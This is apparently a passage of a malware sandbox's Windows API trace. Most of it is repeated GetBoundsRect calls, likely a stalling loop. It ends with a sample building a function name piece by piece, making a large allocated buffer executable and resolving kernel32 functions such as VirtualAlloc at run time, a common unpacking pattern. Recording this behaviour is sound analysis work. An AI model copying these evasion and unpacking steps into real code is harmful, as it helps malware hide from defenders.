lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.486] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.487] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.488] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.489] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.490] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.491] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.502] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.502] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.502] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.502] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.502] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.502] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0153.503] GetBoundsRect (in: hdc=0x0, lprect=0x0, flags=0x0 | out: lprect=0x0) returned 0x0 [0158.305] lstrlenA (lpString="") returned 0 [0158.317] lstrcpyW (in: lpString1=0x6acf68, lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0158.317] LocalAlloc (uFlags=0x0, uBytes=0x90c98) returned 0x2e0020 [0158.318] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0158.369] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0158.369] lstrcatA (in: lpString1="", lpString2="WertualProtect" | out: lpString1="WertualProtect") returned="WertualProtect" [0158.369] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0158.369] VirtualProtect (in: lpAddress=0x2e0020, dwSize=0x90c98, flNewProtect=0x40, lpflOldProtect=0x18f5e8 | out: lpflOldProtect=0x18f5e8*=0x4) returned 1 [0158.398] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0158.398] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0158.399] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0158.399] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0158.399] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 